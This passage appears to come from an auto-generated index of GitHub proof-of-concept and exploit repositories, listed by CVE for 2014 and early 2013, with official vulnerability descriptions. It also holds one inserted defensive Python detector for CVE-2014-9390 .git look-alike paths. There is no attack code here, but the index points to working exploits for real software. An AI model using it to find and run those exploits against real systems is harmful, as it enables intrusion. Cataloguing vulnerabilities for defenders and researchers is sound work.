Gitlist before 0.5.0 allows remote attackers to execute arbitrary commands via shell metacharacters in the file name in the URI of a request for a (1) blame, (2) file, or (3) stats page, as demonstrated by requests to blame/master/, master/, and stats/master/.

- [michaelsss1/gitlist-RCE](https://github.com/michaelsss1/gitlist-RCE)

### CVE-2014-4671 (2014-07-09)

Adobe Flash Player before 13.0.0.231 and 14.x before 14.0.0.145 on Windows and OS X and before 11.2.202.394 on Linux, Adobe AIR before 14.0.0.137 on Android, Adobe AIR SDK before 14.0.0.137, and Adobe AIR SDK & Compiler before 14.0.0.137 do not properly restrict the SWF file format, which allows remote attackers to conduct cross-site request forgery (CSRF) attacks against JSONP endpoints, and obtain sensitive information, via a crafted OBJECT element with SWF content satisfying the character-set requirements of a callback API.

- [cph/rabl-old](https://github.com/cph/rabl-old)

### CVE-2014-4688 (2014-07-02)

pfSense before 2.1.4 allows remote authenticated users to execute arbitrary commands via (1) the hostname value to diag_dns.php in a Create Alias action, (2) the smartmonemail value to diag_smart.php, or (3) the database value to status_rrd_graph_img.php.

- [andyfeili/CVE-2014-4688](https://github.com/andyfeili/CVE-2014-4688)

### CVE-2014-4699 (2014-07-09)

The Linux kernel before 3.15.4 on Intel processors does not properly restrict use of a non-canonical value for the saved RIP address in the case of a system call that does not use IRET, which allows local users to leverage a race condition and gain privileges, or cause a denial of service (double fault), via a crafted application that makes ptrace and fork system calls.

- [vnik5287/cve-2014-4699-ptrace](https://github.com/vnik5287/cve-2014-4699-ptrace)

### CVE-2014-4936 (2014-12-16)

The upgrade functionality in Malwarebytes Anti-Malware (MBAM) consumer before 2.0.3 and Malwarebytes Anti-Exploit (MBAE) consumer 1.04.1.1012 and earlier allow man-in-the-middle attackers to execute arbitrary code by spoofing the update server and uploading an executable.

- [0x3a/CVE-2014-4936](https://github.com/0x3a/CVE-2014-4936)

### CVE-2014-4943 (2014-07-19)

The PPPoL2TP feature in net/l2tp/l2tp_ppp.c in the Linux kernel through 3.15.6 allows local users to gain privileges by leveraging data-structure differences between an l2tp socket and an inet socket.

- [redes-2015/l2tp-socket-bug](https://github.com/redes-2015/l2tp-socket-bug)

### CVE-2014-5139 (2014-08-13)

The ssl_set_client_disabled function in t1_lib.c in OpenSSL 1.0.1 before 1.0.1i allows remote SSL servers to cause a denial of service (NULL pointer dereference and client application crash) via a ServerHello message that includes an SRP ciphersuite without the required negotiation of that ciphersuite with the client.

- [uthrasri/CVE-2014-5139](https://github.com/uthrasri/CVE-2014-5139)
- [uthrasri/G2.5_openssl_CVE-2014-5139](https://github.com/uthrasri/G2.5_openssl_CVE-2014-5139)

### CVE-2014-5284 (2014-12-02)

host-deny.sh in OSSEC before 2.8.1 writes to temporary files with predictable filenames without verifying ownership, which allows local users to modify access restrictions in hosts.deny and gain root privileges by creating the temporary files before automatic IP blocking is performed.

- [mbadanoiu/CVE-2014-5284](https://github.com/mbadanoiu/CVE-2014-5284)

### CVE-2014-5460 (2014-09-11)

Unrestricted file upload vulnerability in the Tribulant Slideshow Gallery plugin before 1.4.7 for WordPress allows remote authenticated users to execute arbitrary code by uploading a PHP file, then accessing it via a direct request to the file in wp-content/uploads/slideshow-gallery/.

- [brookeses69/CVE-2014-5460](https://github.com/brookeses69/CVE-2014-5460)

### CVE-2014-6271 (2014-09-24)

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

- [dlitz/bash-cve-2014-6271-fixes](https://github.com/dlitz/bash-cve-2014-6271-fixes)
- [npm/ansible-bashpocalypse](https://github.com/npm/ansible-bashpocalypse)
- [ryancnelson/patched-bash-4.3](https://github.com/ryancnelson/patched-bash-4.3)
- [jblaine/cookbook-bash-CVE-2014-6271](https://github.com/jblaine/cookbook-bash-CVE-2014-6271)
- [rrreeeyyy/cve-2014-6271-spec](https://github.com/rrreeeyyy/cve-2014-6271-spec)
- [scottjpack/shellshock_scanner](https://github.com/scottjpack/shellshock_scanner)
- [Anklebiter87/Cgi-bin_bash_Reverse](https://github.com/Anklebiter87/Cgi-bin_bash_Reverse)
- [justzx2011/bash-up](https://github.com/justzx2011/bash-up)
- [mattclegg/CVE-2014-6271](https://github.com/mattclegg/CVE-2014-6271)
- [ilismal/Nessus_CVE-2014-6271_check](https://github.com/ilismal/Nessus_CVE-2014-6271_check)
- [RainMak3r/Rainstorm](https://github.com/RainMak3r/Rainstorm)
- [gabemarshall/shocknaww](https://github.com/gabemarshall/shocknaww)
- [woltage/CVE-2014-6271](https://github.com/woltage/CVE-2014-6271)
- [ariarijp/vagrant-shellshock](https://github.com/ariarijp/vagrant-shellshock)
- [themson/shellshock](https://github.com/themson/shellshock)
- [securusglobal/BadBash](https://github.com/securusglobal/BadBash)
- [villadora/CVE-2014-6271](https://github.com/villadora/CVE-2014-6271)
- [APSL/salt-shellshock](https://github.com/APSL/salt-shellshock)
- [teedeedubya/bash-fix-exploit](https://github.com/teedeedubya/bash-fix-exploit)
- [internero/debian-lenny-bash_3.2.52-cve-2014-6271](https://github.com/internero/debian-lenny-bash_3.2.52-cve-2014-6271)
- [u20024804/bash-3.2-fixed-CVE-2014-6271](https://github.com/u20024804/bash-3.2-fixed-CVE-2014-6271)
- [u20024804/bash-4.2-fixed-CVE-2014-6271](https://github.com/u20024804/bash-4.2-fixed-CVE-2014-6271)
- [u20024804/bash-4.3-fixed-CVE-2014-6271](https://github.com/u20024804/bash-4.3-fixed-CVE-2014-6271)
- [francisck/shellshock-cgi](https://github.com/francisck/shellshock-cgi)
- [proclnas/ShellShock-CGI-Scan](https://github.com/proclnas/ShellShock-CGI-Scan)
- [sch3m4/RIS](https://github.com/sch3m4/RIS)
- [ryeyao/CVE-2014-6271_Test](https://github.com/ryeyao/CVE-2014-6271_Test)
- [cj1324/CGIShell](https://github.com/cj1324/CGIShell)
- [renanvicente/puppet-shellshock](https://github.com/renanvicente/puppet-shellshock)
- [indiandragon/Shellshock-Vulnerability-Scan](https://github.com/indiandragon/Shellshock-Vulnerability-Scan)
- [ramnes/pyshellshock](https://github.com/ramnes/pyshellshock)
- [akiraaisha/shellshocker-python](https://github.com/akiraaisha/shellshocker-python)
- [352926/shellshock_crawler](https://github.com/352926/shellshock_crawler)
- [kelleykong/cve-2014-6271-mengjia-kong](https://github.com/kelleykong/cve-2014-6271-mengjia-kong)
- [huanlu/cve-2014-6271-huan-lu](https://github.com/huanlu/cve-2014-6271-huan-lu)
- [sunnyjiang/shellshocker-android](https://github.com/sunnyjiang/shellshocker-android)
- [P0cL4bs/ShellShock-CGI-Scan](https://github.com/P0cL4bs/ShellShock-CGI-Scan)
- [hmlio/vaas-cve-2014-6271](https://github.com/hmlio/vaas-cve-2014-6271)
- [opsxcq/exploit-CVE-2014-6271](https://github.com/opsxcq/exploit-CVE-2014-6271)
- [Pilou-Pilou/docker_CVE-2014-6271.](https://github.com/Pilou-Pilou/docker_CVE-2014-6271.)
- [zalalov/CVE-2014-6271](https://github.com/zalalov/CVE-2014-6271)
- [heikipikker/shellshock-shell](https://github.com/heikipikker/shellshock-shell)
- [0x00-0x00/CVE-2014-6271](https://github.com/0x00-0x00/CVE-2014-6271)
- [kowshik-sundararajan/CVE-2014-6271](https://github.com/kowshik-sundararajan/CVE-2014-6271)
- [w4fz5uck5/ShockZaum-CVE-2014-6271](https://github.com/w4fz5uck5/ShockZaum-CVE-2014-6271)
- [Aruthw/CVE-2014-6271](https://github.com/Aruthw/CVE-2014-6271)
- [cved-sources/cve-2014-6271](https://github.com/cved-sources/cve-2014-6271)
- [shawntns/exploit-CVE-2014-6271](https://github.com/shawntns/exploit-CVE-2014-6271)
- [Sindadziy/cve-2014-6271](https://github.com/Sindadziy/cve-2014-6271)
- [wenyu1999/bash-shellshock](https://github.com/wenyu1999/bash-shellshock)
- [Sindayifu/CVE-2019-14287-CVE-2014-6271](https://github.com/Sindayifu/CVE-2019-14287-CVE-2014-6271)
- [Any3ite/CVE-2014-6271](https://github.com/Any3ite/CVE-2014-6271)
- [somhm-solutions/Shell-Shock](https://github.com/somhm-solutions/Shell-Shock)
- [rashmikadileeshara/CVE-2014-6271-Shellshock-](https://github.com/rashmikadileeshara/CVE-2014-6271-Shellshock-)
- [Dilith006/CVE-2014-6271](https://github.com/Dilith006/CVE-2014-6271)
- [cyberharsh/Shellbash-CVE-2014-6271](https://github.com/cyberharsh/Shellbash-CVE-2014-6271)
- [MuirlandOracle/CVE-2014-6271-IPFire](https://github.com/MuirlandOracle/CVE-2014-6271-IPFire)
- [mochizuki875/CVE-2014-6271-Apache-Debian](https://github.com/mochizuki875/CVE-2014-6271-Apache-Debian)
- [b4keSn4ke/CVE-2014-6271](https://github.com/b4keSn4ke/CVE-2014-6271)
- [hadrian3689/shellshock](https://github.com/hadrian3689/shellshock)
- [akr3ch/CVE-2014-6271](https://github.com/akr3ch/CVE-2014-6271)
- [0xConstant/CVE-2014-6271](https://github.com/0xConstant/CVE-2014-6271)
- [Gurguii/cgi-bin-shellshock](https://github.com/Gurguii/cgi-bin-shellshock)
- [anujbhan/shellshock-victim-host](https://github.com/anujbhan/shellshock-victim-host)
- [FilipStudeny/-CVE-2014-6271-Shellshock-Remote-Command-Injection-](https://github.com/FilipStudeny/-CVE-2014-6271-Shellshock-Remote-Command-Injection-)
- [mritunjay-k/CVE-2014-6271](https://github.com/mritunjay-k/CVE-2014-6271)
- [Brandaoo/CVE-2014-6271](https://github.com/Brandaoo/CVE-2014-6271)
- [Jsmoreira02/CVE-2014-6271](https://github.com/Jsmoreira02/CVE-2014-6271)
- [hanmin0512/CVE-2014-6271_pwnable](https://github.com/hanmin0512/CVE-2014-6271_pwnable)
- [0xTabun/CVE-2014-6271](https://github.com/0xTabun/CVE-2014-6271)
- [0xN7y/CVE-2014-6271](https://github.com/0xN7y/CVE-2014-6271)
- [AlissonFaoli/Shellshock](https://github.com/AlissonFaoli/Shellshock)
- [hackintoanetwork/shellshock](https://github.com/hackintoanetwork/shellshock)
- [ajansha/shellshock](https://github.com/ajansha/shellshock)
- [K3ysTr0K3R/CVE-2014-6271-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2014-6271-EXPLOIT)
- [TheRealCiscoo/Shellshock-Exploit](https://github.com/TheRealCiscoo/Shellshock-Exploit)

### CVE-2014-6287 (2014-10-07)

The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (aka HFS or HttpFileServer) 2.3x before 2.3c allows remote attackers to execute arbitrary programs via a %00 sequence in a search action.

- [roughiz/cve-2014-6287.py](https://github.com/roughiz/cve-2014-6287.py)
- [Nicoslo/Windows-exploitation-Rejetto-HTTP-File-Server-HFS-2.3.x-CVE-2014-6287](https://github.com/Nicoslo/Windows-exploitation-Rejetto-HTTP-File-Server-HFS-2.3.x-CVE-2014-6287)
- [wizardy0ga/THM-Steel_Mountain-CVE-2014-6287](https://github.com/wizardy0ga/THM-Steel_Mountain-CVE-2014-6287)
- [mrintern/thm_steelmountain_CVE-2014-6287](https://github.com/mrintern/thm_steelmountain_CVE-2014-6287)
- [hadrian3689/rejetto_hfs_rce](https://github.com/hadrian3689/rejetto_hfs_rce)
- [randallbanner/Rejetto-HTTP-File-Server-HFS-2.3.x---Remote-Command-Execution](https://github.com/randallbanner/Rejetto-HTTP-File-Server-HFS-2.3.x---Remote-Command-Execution)
- [0xTabun/CVE-2014-6287](https://github.com/0xTabun/CVE-2014-6287)
- [zhsh9/CVE-2014-6287](https://github.com/zhsh9/CVE-2014-6287)

### CVE-2014-6332 (2014-11-11)

OleAut32.dll in OLE in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to execute arbitrary code via a crafted web site, as demonstrated by an array-redimensioning attempt that triggers improper handling of a size value in the SafeArrayDimen function, aka "Windows OLE Automation Array Remote Code Execution Vulnerability."

- [MarkoArmitage/metasploit-framework](https://github.com/MarkoArmitage/metasploit-framework)
- [tjjh89017/cve-2014-6332](https://github.com/tjjh89017/cve-2014-6332)
- [mourr/CVE-2014-6332](https://github.com/mourr/CVE-2014-6332)

### CVE-2014-6577 (2015-01-21)

Unspecified vulnerability in the XML Developer's Kit for C component in Oracle Database Server 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality via unknown vectors. NOTE: the previous information is from the January 2015 CPU. Oracle has not commented on the original researcher's claim that this is an XML external entity (XXE) vulnerability in the XML parser, which allows attackers to conduct internal port scanning, perform SSRF attacks, or cause a denial of service via a crafted (1) http: or (2) ftp: URI.

- [SecurityArtWork/oracle-xxe-sqli](https://github.com/SecurityArtWork/oracle-xxe-sqli)

### CVE-2014-6598 (2015-01-21)

Unspecified vulnerability in the Oracle Communications Diameter Signaling Router component in Oracle Communications Applications 3.x, 4.x, and 5.0 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to Signaling - DPI.

- [KPN-CISO/DRA_writeup](https://github.com/KPN-CISO/DRA_writeup)

### CVE-2014-6721 (2014-09-26)

The Pharmaguideline (aka com.pharmaguideline) application 1.2.0 for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

- [sagisar1/CVE-2014-6721-exploit-Shellshock](https://github.com/sagisar1/CVE-2014-6721-exploit-Shellshock)

### CVE-2014-7169 (2014-09-25)

GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271.

- [chef-boneyard/bash-shellshock](https://github.com/chef-boneyard/bash-shellshock)
- [gina-alaska/bash-cve-2014-7169-cookbook](https://github.com/gina-alaska/bash-cve-2014-7169-cookbook)
- [Gobinath-B/SHELL-SCHOCK](https://github.com/Gobinath-B/SHELL-SCHOCK)

### CVE-2014-7205 (2014-10-08)

Eval injection vulnerability in the internals.batch function in lib/batch.js in the bassmaster plugin before 1.5.2 for the hapi server framework for Node.js allows remote attackers to execute arbitrary Javascript code via unspecified vectors.

- [maximilianmarx/bassmaster-rce](https://github.com/maximilianmarx/bassmaster-rce)
- [AndrewTrube/CVE-2014-7205](https://github.com/AndrewTrube/CVE-2014-7205)

### CVE-2014-7236 (2020-02-17)

Eval injection vulnerability in lib/TWiki/Plugins.pm in TWiki before 6.0.1 allows remote attackers to execute arbitrary Perl code via the debugenableplugins parameter to do/view/Main/WebHome.

- [m0nad/CVE-2014-7236_Exploit](https://github.com/m0nad/CVE-2014-7236_Exploit)

### CVE-2014-7911 (2014-12-15)

luni/src/main/java/java/io/ObjectInputStream.java in the java.io.ObjectInputStream implementation in Android before 5.0.0 does not verify that deserialization will result in an object that met the requirements for serialization, which allows attackers to execute arbitrary code via a crafted finalize method for a serialized object in an ArrayMap Parcel within an intent sent to system_service, as demonstrated by the finalize method of android.os.BinderProxy, aka Bug 15874291.

- [retme7/CVE-2014-7911_poc](https://github.com/retme7/CVE-2014-7911_poc)
- [ele7enxxh/CVE-2014-7911](https://github.com/ele7enxxh/CVE-2014-7911)
- [heeeeen/CVE-2014-7911poc](https://github.com/heeeeen/CVE-2014-7911poc)
- [GeneBlue/cve-2014-7911-exp](https://github.com/GeneBlue/cve-2014-7911-exp)
- [koozxcv/CVE-2014-7911](https://github.com/koozxcv/CVE-2014-7911)
- [koozxcv/CVE-2014-7911-CVE-2014-4322_get_root_privilege](https://github.com/koozxcv/CVE-2014-7911-CVE-2014-4322_get_root_privilege)
- [mabin004/cve-2014-7911](https://github.com/mabin004/cve-2014-7911)

### CVE-2014-7920 (2017-04-13)

mediaserver in Android 2.2 through 5.x before 5.1 allows attackers to gain privileges. NOTE: This is a different vulnerability than CVE-2014-7921.

- [laginimaineb/cve-2014-7920-7921](https://github.com/laginimaineb/cve-2014-7920-7921)
- [Vinc3nt4H/cve-2014-7920-7921_update](https://github.com/Vinc3nt4H/cve-2014-7920-7921_update)

### CVE-2014-8110 (2015-02-12)

Multiple cross-site scripting (XSS) vulnerabilities in the web based administration console in Apache ActiveMQ 5.x before 5.10.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.

- [tafamace/CVE-2014-8110](https://github.com/tafamace/CVE-2014-8110)

### CVE-2014-8142 (2014-12-20)

Use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.36, 5.5.x before 5.5.20, and 5.6.x before 5.6.4 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate keys within the serialized properties of an object, a different vulnerability than CVE-2004-1019.

- [3xp10it/php_cve-2014-8142_cve-2015-0231](https://github.com/3xp10it/php_cve-2014-8142_cve-2015-0231)

### CVE-2014-8244 (2014-11-01)

Linksys SMART WiFi firmware on EA2700 and EA3500 devices; before 2.1.41 build 162351 on E4200v2 and EA4500 devices; before 1.1.41 build 162599 on EA6200 devices; before 1.1.40 build 160989 on EA6300, EA6400, EA6500, and EA6700 devices; and before 1.1.42 build 161129 on EA6900 devices allows remote attackers to obtain sensitive information or modify data via a JNAP action in a JNAP/ HTTP request.

- [JollyJumbuckk/LinksysLeaks](https://github.com/JollyJumbuckk/LinksysLeaks)

### CVE-2014-8275 (2015-01-09)

OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k does not enforce certain constraints on certificate data, which allows remote attackers to defeat a fingerprint-based certificate-blacklist protection mechanism by including crafted data within a certificate's unsigned portion, related to crypto/asn1/a_verify.c, crypto/dsa/dsa_asn1.c, crypto/ecdsa/ecs_vrf.c, and crypto/x509/x_all.c.

- [uthrasri/Openssl_G2.5_CVE-2014-8275](https://github.com/uthrasri/Openssl_G2.5_CVE-2014-8275)
- [uthrasri/CVE-2014-8275_openssl_g2.5](https://github.com/uthrasri/CVE-2014-8275_openssl_g2.5)

### CVE-2014-8609 (2014-12-15)

The addAccount method in src/com/android/settings/accounts/AddAccountSettings.java in the Settings application in Android before 5.0.0 does not properly create a PendingIntent, which allows attackers to use the SYSTEM uid for broadcasting an intent with arbitrary component, action, or category information via a third-party authenticator in a crafted application, aka Bug 17356824.

- [locisvv/Vulnerable-CVE-2014-8609](https://github.com/locisvv/Vulnerable-CVE-2014-8609)
- [MazX0p/CVE-2014-8609-POC](https://github.com/MazX0p/CVE-2014-8609-POC)
- [ratiros01/CVE-2014-8609-exploit](https://github.com/ratiros01/CVE-2014-8609-exploit)

### CVE-2014-8682 (2014-11-21)

Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go.

- [nihal1306/gogs](https://github.com/nihal1306/gogs)

### CVE-2014-8729
- [inso-/TORQUE-Resource-Manager-2.5.x-2.5.13-stack-based-buffer-overflow-exploit-CVE-2014-8729-CVE-2014-878](https://github.com/inso-/TORQUE-Resource-Manager-2.5.x-2.5.13-stack-based-buffer-overflow-exploit-CVE-2014-8729-CVE-2014-878)

### CVE-2014-8731 (2017-03-23)

PHPMemcachedAdmin 1.2.2 and earlier allows remote attackers to execute arbitrary PHP code via vectors related to "serialized data and the last part of the concatenated filename," which creates a file in webroot.

- [sbani/CVE-2014-8731-PoC](https://github.com/sbani/CVE-2014-8731-PoC)

### CVE-2014-8757 (2015-02-17)

LG On-Screen Phone (OSP) before 4.3.010 allows remote attackers to bypass authorization via a crafted request.

- [irsl/lgosp-poc](https://github.com/irsl/lgosp-poc)

### CVE-2014-9016 (2014-11-24)

The password hashing API in Drupal 7.x before 7.34 and the Secure Password Hashes (aka phpass) module 6.x-2.x before 6.x-2.1 for Drupal allows remote attackers to cause a denial of service (CPU and memory consumption) via a crafted request.

- [c0r3dump3d/wp_drupal_timing_attack](https://github.com/c0r3dump3d/wp_drupal_timing_attack)
- [Primus27/WordPress-Long-Password-Denial-of-Service](https://github.com/Primus27/WordPress-Long-Password-Denial-of-Service)

### CVE-2014-9222 (2014-12-24)

AllegroSoft RomPager 4.34 and earlier, as used in Huawei Home Gateway products and other vendors and products, allows remote attackers to gain privileges via a crafted cookie that triggers memory corruption, aka the "Misfortune Cookie" vulnerability.

- [BenChaliah/MIPS-CVE-2014-9222](https://github.com/BenChaliah/MIPS-CVE-2014-9222)
- [donfanning/MIPS-CVE-2014-9222](https://github.com/donfanning/MIPS-CVE-2014-9222)

### CVE-2014-9295 (2014-12-20)

Multiple stack-based buffer overflows in ntpd in NTP before 4.2.8 allow remote attackers to execute arbitrary code via a crafted packet, related to (1) the crypto_recv function when the Autokey Authentication feature is used, (2) the ctl_putdata function, and (3) the configure function.

- [MacMiniVault/NTPUpdateSnowLeopard](https://github.com/MacMiniVault/NTPUpdateSnowLeopard)

### CVE-2014-9301 (2014-12-07)

Server-side request forgery (SSRF) vulnerability in the proxy servlet in Alfresco Community Edition before 5.0.a allows remote attackers to trigger outbound requests to intranet servers, conduct port scans, and read arbitrary files via a crafted URI in the endpoint parameter.

- [ottimo/burp-alfresco-referer-proxy-cve-2014-9301](https://github.com/ottimo/burp-alfresco-referer-proxy-cve-2014-9301)

### CVE-2014-9322 (2014-12-17)

arch/x86/kernel/entry_64.S in the Linux kernel before 3.17.5 does not properly handle faults associated with the Stack Segment (SS) segment register, which allows local users to gain privileges by triggering an IRET instruction that leads to access to a GS Base address from the wrong space.

- [RKX1209/CVE-2014-9322](https://github.com/RKX1209/CVE-2014-9322)

### CVE-2014-9390 (2020-02-12)

Git before 1.8.5.6, 1.9.x before 1.9.5, 2.0.x before 2.0.5, 2.1.x before 2.1.4, and 2.2.x before 2.2.1 on Windows and OS X; Mercurial before 3.2.3 on Windows and OS X; Apple Xcode before 6.2 beta 3; mine all versions before 08-12-2014; libgit2 all versions up to 0.21.2; Egit all versions before 08-12-2014; and JGit all versions before 08-12-2014 allow remote Git servers to execute arbitrary commands via a tree containing a crafted .git/config file with (1) an ignorable Unicode codepoint, (2) a git~1/config representation, or (3) mixed case that is improperly handled on a case-insensitive filesystem.

- [hakatashi/CVE-2014-9390](https://github.com/hakatashi/CVE-2014-9390)
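The three name variants in the description above can be checked before a tree is ever written to disk. The following is an added example, not code from the repository listed here: it folds a path component the way a case-insensitive NTFS (8.3 short name `git~1`, trailing dots and spaces dropped) or HFS+ (ignorable codepoints skipped, case folded) would, and flags anything that lands on `.git`. The HFS+ ignorable set is the one HFS+ skips when comparing names and is the main assumption in the code; the sample tree is constructed.

```python
"""Flag tree entries that a case-insensitive or Unicode-folding filesystem
would check out as ".git" (the CVE-2014-9390 vector).  Added example."""
from typing import Iterable, List

# Codepoints HFS+ ignores when comparing file names (assumed complete).
HFS_IGNORABLE = frozenset([
    0x200C, 0x200D, 0x200E, 0x200F,
    0x202A, 0x202B, 0x202C, 0x202D, 0x202E,
    0x206A, 0x206B, 0x206C, 0x206D, 0x206E, 0x206F,
    0xFEFF,
])


def is_hfs_dotgit(name: str) -> bool:
    """True if HFS+ would treat `name` as '.git' after dropping ignorable
    codepoints (e.g. U+200C inside '.g\u200cit') and folding case."""
    folded = "".join(ch for ch in name if ord(ch) not in HFS_IGNORABLE)
    return folded.lower() == ".git"


def is_ntfs_dotgit(name: str) -> bool:
    """True if NTFS would resolve `name` to the .git directory: the 8.3 short
    name 'git~1', or '.git' in any case once trailing dots/spaces (which NTFS
    strips on lookup) are removed."""
    stripped = name.rstrip(" .").lower()
    return stripped in (".git", "git~1")


def is_dotgit_variant(name: str) -> bool:
    return is_hfs_dotgit(name) or is_ntfs_dotgit(name)


def unsafe_tree_paths(paths: Iterable[str]) -> List[str]:
    """Return every path with a .git look-alike component.  A legitimate tree
    never contains any of them: git itself refuses to add '.git' to the index,
    so a match means the tree came from a hostile server."""
    return [p for p in paths if any(is_dotgit_variant(c) for c in p.split("/"))]


# Constructed sample tree listing (not taken from a real repository).
SAMPLE_TREE = [
    "README.md",
    ".gitignore",
    ".Git/config",                 # mixed case
    "git~1/config",                # NTFS 8.3 short name
    ".g\u200cit/config",           # HFS+ ignorable codepoint
    ".git./hooks/post-checkout",   # trailing dot stripped by NTFS
]
```

Run `unsafe_tree_paths()` over the tree entries of every fetched commit before checkout; any hit is a reason to abort the fetch rather than to rename the entry.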

### CVE-2014-10069 (2018-01-07)

Hitron CVE-30360 devices use a 578A958E3DD933FC DES key that is shared across different customers' installations, which makes it easier for attackers to obtain sensitive information by decrypting a backup configuration file, as demonstrated by a password hash in the um_auth_account_password field.

- [aimoda/hitron-cfg-decrypter](https://github.com/aimoda/hitron-cfg-decrypter)

### CVE-2014-91371
- [jamaal001/CVE-2014-91371-Wordpress-](https://github.com/jamaal001/CVE-2014-91371-Wordpress-)

## 2013
### CVE-2013-0156 (2013-01-13)

active_support/core_ext/hash/conversions.rb in Ruby on Rails before 2.3.15, 3.0.x before 3.0.19, 3.1.x before 3.1.10, and 3.2.x before 3.2.11 does not properly restrict casts of string values, which allows remote attackers to conduct object-injection attacks and execute arbitrary code, or cause a denial of service (memory and CPU consumption) involving nested XML entity references, by leveraging Action Pack support for (1) YAML type conversion or (2) Symbol type conversion.

- [terracatta/name_reverser](https://github.com/terracatta/name_reverser)
- [heroku/heroku-CVE-2013-0156](https://github.com/heroku/heroku-CVE-2013-0156)
- [josal/crack-0.1.8-fixed](https://github.com/josal/crack-0.1.8-fixed)
- [bsodmike/rails-exploit-cve-2013-0156](https://github.com/bsodmike/rails-exploit-cve-2013-0156)
- [R3dKn33-zz/CVE-2013-0156](https://github.com/R3dKn33-zz/CVE-2013-0156)
- [Jjdt12/kuang_grade_mk11](https://github.com/Jjdt12/kuang_grade_mk11)

### CVE-2013-0212 (2013-02-24)

store/swift.py in OpenStack Glance Essex (2012.1), Folsom (2012.2) before 2012.2.3, and Grizzly, when in Swift single tenant mode, logs the Swift endpoint's user name and password in cleartext when the endpoint is misconfigured or unusable, allows remote authenticated users to obtain sensitive information by reading the error messages.

- [LogSec/CVE-2013-0212](https://github.com/LogSec/CVE-2013-0212)

### CVE-2013-0229 (2013-01-31)

The ProcessSSDPRequest function in minissdp.c in the SSDP handler in MiniUPnP MiniUPnPd before 1.4 allows remote attackers to cause a denial of service (service crash) via a crafted request that triggers a buffer over-read.

- [lochiiconnectivity/vulnupnp](https://github.com/lochiiconnectivity/vulnupnp)

### CVE-2013-0269 (2013-02-13)

The JSON gem before 1.5.5, 1.6.x before 1.6.8, and 1.7.x before 1.7.7 for Ruby allows remote attackers to cause a denial of service (resource consumption) or bypass the mass assignment protection mechanism via a crafted JSON document that triggers the creation of arbitrary Ruby symbols or certain internal objects, as demonstrated by conducting a SQL injection attack against Ruby on Rails, aka "Unsafe Object Creation Vulnerability."

- [heroku/heroku-CVE-2013-0269](https://github.com/heroku/heroku-CVE-2013-0269)
- [danring/heroku-CVE-2013-0269](https://github.com/danring/heroku-CVE-2013-0269)

### CVE-2013-0303 (2014-03-23)

Unspecified vulnerability in core/ajax/translations.php in ownCloud before 4.0.12 and 4.5.x before 4.5.6 allows remote authenticated users to execute arbitrary PHP code via unknown vectors. NOTE: this entry has been SPLIT due to different affected versions. The core/settings.php issue is covered by CVE-2013-7344.

- [CiscoCXSecurity/ownCloud_RCE_CVE-2013-0303](https://github.com/CiscoCXSecurity/ownCloud_RCE_CVE-2013-0303)

### CVE-2013-0333 (2013-01-30)

lib/active_support/json/backends/yaml.rb in Ruby on Rails 2.3.x before 2.3.16 and 3.0.x before 3.0.20 does not properly convert JSON data to YAML data for processing by a YAML parser, which allows remote attackers to execute arbitrary code, conduct SQL injection attacks, or bypass authentication via crafted data that triggers unsafe decoding, a different vulnerability than CVE-2013-0156.

- [heroku/heroku-CVE-2013-0333](https://github.com/heroku/heroku-CVE-2013-0333)

### CVE-2013-225
- [PentestinGxRoot/ShellEvil](https://github.com/PentestinGxRoot/ShellEvil)

### CVE-2013-1081 (2013-03-11)

Directory traversal vulnerability in MDM.php in Novell ZENworks Mobile Management (ZMM) 2.6.1 and 2.7.0 allows remote attackers to include and execute arbitrary local files via the language parameter.

- [steponequit/CVE-2013-1081](https://github.com/steponequit/CVE-2013-1081)

### CVE-2013-1300 (2013-07-10)

win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Memory Allocation Vulnerability."

- [Meatballs1/cve-2013-1300](https://github.com/Meatballs1/cve-2013-1300)

### CVE-2013-1488 (2013-03-08)

The Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier, and OpenJDK 6 and 7, allows remote attackers to execute arbitrary code via unspecified vectors involving reflection, Libraries, "improper toString calls," and the JDBC driver manager, as demonstrated by James Forshaw during a Pwn2Own competition at CanSecWest 2013.

- [v-p-b/buherablog-cve-2013-1488](https://github.com/v-p-b/buherablog-cve-2013-1488)

### CVE-2013-1491 (2013-03-08)

